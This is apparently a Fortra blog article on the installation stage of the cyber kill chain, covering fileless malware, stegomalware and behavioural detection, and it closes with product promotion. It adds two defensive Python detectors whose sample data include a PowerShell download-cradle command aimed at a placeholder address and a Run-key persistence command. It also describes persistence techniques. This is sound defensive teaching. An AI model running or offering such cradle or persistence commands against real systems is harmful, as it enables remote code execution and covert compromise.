
What Is Installation in the Cyber Kill Chain?
The installation phase of the cyber kill chain is when attackers install malware onto the victim’s machine in order to maintain their presence there after they’ve gained initial entry. And this is something they’ve worked for from step one.
First, in the reconnaissance stage, the attacker gathers what they can about the target: people, infrastructure, and exposed services. In the weaponization stage, they pair an exploit with a payload, and in the delivery stage they get that package to the victim, whether as a phishing attachment, a malicious link, or a compromised website. The exploitation stage is where the delivered exploit actually fires and attacker code runs on the victim's system; that first foothold is what the attacker now wants to keep and extend.
At this point, they're not ready to go home. The installation phase is how they keep the good thing they've got, access to a victim's systems, by making themselves difficult to remove. It can involve infecting additional devices, planting backdoors, and otherwise establishing persistence in as many covert ways as possible: autorun registry keys, scheduled tasks, new services, WMI event subscriptions, or web shells on exposed servers. Next comes command and control (C2) and, ultimately, actions on objectives, so this is a crucial step for attackers.
Common Techniques Used During Installation
In the installation phase of the cyber kill chain, the name of the game (if you're a black hat) is to install a foothold that lets you keep advancing: malware, a backdoor, or a persistence mechanism that survives a reboot. You're already in, so how hard could it be? Very hard, if you're trying not to get caught.
There are two broad options: dropping malware as files on disk, or running fileless malware that lives in memory and in places like the registry or WMI. Writing a binary to disk is effective, but it is noisy: it gives antivirus something to scan and hash, and it can send the SOC running in your direction. Fileless techniques are therefore often the weapon of choice for "low and slow" attacks that stay under the radar while the attacker does their dirty work. Fileless malware frequently relies on "living off the land," that is, abusing legitimate tools already present on the system (PowerShell, WMI, mshta.exe, rundll32.exe) rather than bringing its own binaries; the two terms overlap heavily but are not synonyms.
These fileless attacks run their payload straight from memory, so there is often no malicious executable on disk for a scanner to find; persistence, when it is needed, hides in registry keys, WMI subscriptions, or scheduled tasks rather than in a dropped file. By abusing trusted, signed programs (PowerShell, or the Windows Script Host executables wscript.exe and cscript.exe) to launch malicious activity, attackers get a head start on security tools that are busy looking for unknown or non-allow-listed programs. These attacks are hard to catch because signature-based antivirus and network IDS/IPS rarely inspect process command lines or in-memory behavior, which is exactly where the evidence lives. By the time the consequences become obvious enough to detect, it is often too late.
How to Detect Attacks at the Installation Stage
When it comes to detecting this stage (stage 5 of 7) of the cyber kill chain, all is not lost. Solutions that detect indicators of attack (IOAs), the behaviors an intrusion has to exhibit no matter which malware carries it out, are your best bet for finding sneaky, embedded actors on your network. Unlike tools that only match indicators of compromise (IOCs) such as file hashes and known malware samples, solutions like extended detection and response (XDR) can spot suspicious alterations and anomalous activity in the act: a new autorun entry, an Office application spawning a script interpreter, a signed system binary loading code from an unusual path. AI-driven detection can flag such changes and notify the SOC as soon as they occur.
In addition, investing in things like next-generation antivirus, a SIEM, and anything else that gives you visibility into the "normal" behavior of your network is always a safe bet: which parents launch PowerShell, which accounts create scheduled tasks, which services start at boot. Attackers get away with installation-stage activity when their subtle changes to the system go unnoticed. If your SOC knows the baseline behaviors to expect, it can detect when something deviates from them.
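To make the behavioral approach described above concrete, here is an added example, not code from the original article or from Fortra, of the kind of checks a SOC runs over process-creation telemetry. It examines Sysmon-style Event ID 1 records (Image, ParentImage, CommandLine) that are constructed inline, decodes PowerShell -EncodedCommand payloads and looks for download cradles, flags script hosts launched by parents outside a hypothetical baseline, and catches Run-key persistence written with reg.exe. The baseline, the sample events and the 203.0.113.7 address (documentation range) are all assumptions made for the demo.

```python
"""Toy installation-stage detector over process-creation telemetry.

Added example, not code from the original article or from Fortra. It runs
behavioral checks over Sysmon-style Event ID 1 records (Image, ParentImage,
CommandLine) that are constructed inline for the demo.
"""
import base64
import re

# Constructed sample: the encoded command is a classic PowerShell download
# cradle; 203.0.113.7 is from the TEST-NET-3 documentation range.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
                    r" /v Updater /t REG_SZ /d C:\Users\Public\u.vbs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Temp"},
]

# Hypothetical baseline: which parents normally launch each script host here.
# In practice this is learned from weeks of your own telemetry, not hard-coded.
BASELINE_PARENTS = {
    "powershell.exe": {"explorer.exe", "cmd.exe", "services.exe"},
    "wscript.exe": {"explorer.exe"},
    "cscript.exe": {"explorer.exe", "cmd.exe"},
}

ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
CRADLE_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|Net\.WebClient|Invoke-WebRequest",
                       re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, so rules compare plain image names."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not valid base64
        return None


def analyze_event(ev):
    """Return the list of findings for one process-creation event."""
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    findings = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell command")
        if CRADLE_RE.search(decoded):
            findings.append("download cradle in decoded command")
    if image in BASELINE_PARENTS and parent not in BASELINE_PARENTS[image]:
        findings.append(f"unexpected parent {parent} for {image}")
    if image == "reg.exe" and " add " in cmd.lower() and RUN_KEY_RE.search(cmd):
        findings.append("Run key persistence via reg.exe")
    if image == "schtasks.exe" and "/create" in cmd.lower():
        findings.append("scheduled task creation")
    return findings


def analyze(events):
    """Map event index -> findings, for events that triggered at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := analyze_event(ev))}


if __name__ == "__main__":
    for idx, hits in analyze(SAMPLE_EVENTS).items():
        print(f"event {idx}: {basename(SAMPLE_EVENTS[idx]['Image'])}: {'; '.join(hits)}")
```

Two of the four constructed events are flagged: the Word-spawned encoded PowerShell (three findings) and the reg.exe Run-key write; the benign explorer.exe and user-launched PowerShell pass. None of these rules needs a malware hash, which is the point: a tuned baseline of parent-child relationships plus a handful of LOLBin rules covers a large share of installation-stage activity, and the decoded command line is what an analyst wants in the alert rather than the raw base64.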
Future Trends
As things like remote access Trojans (RATs) continue to evolve, we can expect to see new and increasingly evasive tactics like steganography appear more often. Steganographic malware, or stegomalware, is a form of hacker sleight of hand in which attackers “[hide] malicious code within innocuous files like images so that the viewer or scanner only sees what the attacker wants them to see,” as Fortra Lead Solutions Engineer Dr. Steve Jeffery states.
And what do they see? A picture. Stegomalware hides its payload in the low-order bits of pixel values, where the change is invisible to the eye, or simply appends a string of malicious code after the image's end-of-file marker, where viewers never look. The image itself does not execute anything; a separate loader, typically a script or a small dropped binary, reads the payload back out and runs it, which is why process and memory telemetry still matters even when the carrier file looks clean. Sneaky, isn't it?
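The appended-payload variant is the easiest of the two to check for, because a well-formed PNG ends at its IEND chunk and a JPEG at its EOI marker, so anything after that point is not image data. The following added example, not code from the original article or from Fortra, walks both container formats and returns whatever trails the end marker. The sample images, including the JPEG skeleton (which exercises the marker walk but is not a decodable picture), and the appended PowerShell string are constructed for the demo.

```python
"""Find data appended after an image's end-of-image marker.

Added example, not from the original article. Viewers stop at the PNG IEND
chunk or the JPEG EOI marker, so a payload placed after it is invisible to the
eye but trivially recoverable by a loader that knows where to look.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def build_png(width=1, height=1, rgb=(255, 255, 255)):
    """Construct a minimal valid 8-bit RGB PNG (used only to fabricate samples)."""
    def chunk(ctype, data):
        body = ctype + data
        return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + bytes(rgb) * width for _ in range(height))  # filter byte + pixels
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def png_end_offset(data):
    """Walk PNG chunks; return the offset just past IEND, or None if malformed."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + data + 4 CRC
        if end > len(data):
            return None
        if ctype == b"IEND":
            return end
        pos = end
    return None


def jpeg_end_offset(data):
    """Walk JPEG segments; return the offset just past EOI (FF D9), or None if malformed."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xD9:                                  # EOI: the image ends here
            return pos + 2
        if marker == 0xFF:                                  # fill byte
            pos += 1
            continue
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:        # standalone markers, no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        pos += 2 + struct.unpack(">H", data[pos + 2:pos + 4])[0]  # length covers itself
        if marker == 0xDA:  # SOS: skip entropy-coded data to the next real marker
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] != 0x00 and not 0xD0 <= data[pos + 1] <= 0xD7
            ):
                pos += 1
    return None


def trailing_bytes(data):
    """Bytes after the end marker (b"" if none); None if the blob is not a parseable PNG/JPEG."""
    if data.startswith(PNG_SIG):
        end = png_end_offset(data)
    elif data.startswith(b"\xff\xd8"):
        end = jpeg_end_offset(data)
    else:
        return None
    return None if end is None else data[end:]


# Constructed samples. The JPEG skeleton (SOI, APP0, SOS with a stuffed FF 00 pair, EOI)
# exercises the marker walk; it is not a decodable picture.
PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s.ps1')"
CLEAN_PNG = build_png()
TAINTED_PNG = CLEAN_PNG + PAYLOAD
CLEAN_JPEG = (b"\xff\xd8" + b"\xff\xe0" + struct.pack(">H", 4) + b"JF"
              + b"\xff\xda" + struct.pack(">H", 2) + b"\x12\xff\x00\x34" + b"\xff\xd9")
TAINTED_JPEG = CLEAN_JPEG + PAYLOAD

if __name__ == "__main__":
    for name, blob in [("clean.png", CLEAN_PNG), ("tainted.png", TAINTED_PNG),
                       ("clean.jpg", CLEAN_JPEG), ("tainted.jpg", TAINTED_JPEG)]:
        extra = trailing_bytes(blob)
        print(f"{name}: {len(extra)} trailing byte(s)" + (f" -> {extra[:40]!r}" if extra else ""))
```

This check only covers the appended-data form; payloads spread across the least significant bits of pixel values leave the container perfectly well-formed and need statistical tests or a comparison against a known-good original. Either way, the carrier is inert on its own, so the loader that extracts and executes the payload remains the more reliable thing to alert on.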
Thwarting the Attack Chain at Installation with Fortra
How do you detect things like fileless malware actions, stegomalware, or malware otherwise hiding in plain sight, even if it has evaded detection by your antivirus solution at the door?
You need AI-powered solutions trained to spot anomalies, not just scan for signatures. Things like Fortra’s capabilities for cloud email protection, extended detection and response, and integrity and compliance monitoring will get you headed in the right direction.
Being able to spot malicious activity at the source, and in its rawest form, is crucial to breaking the cyber kill chain at the installation phase. As this is one of the trickiest stages to detect, nothing less than the best, most advanced tools on the market will do.
Fortra’s cutting-edge solutions come in at every stage of the attack chain; competitors’ solutions often cover just one. Trust Fortra’s real-time indicators of attack and deep, AI-driven detection tools to help you find what other tools just can’t catch.
Want to learn more?
Start at the beginning and master the basics: What Is the Cyber Attack Chain?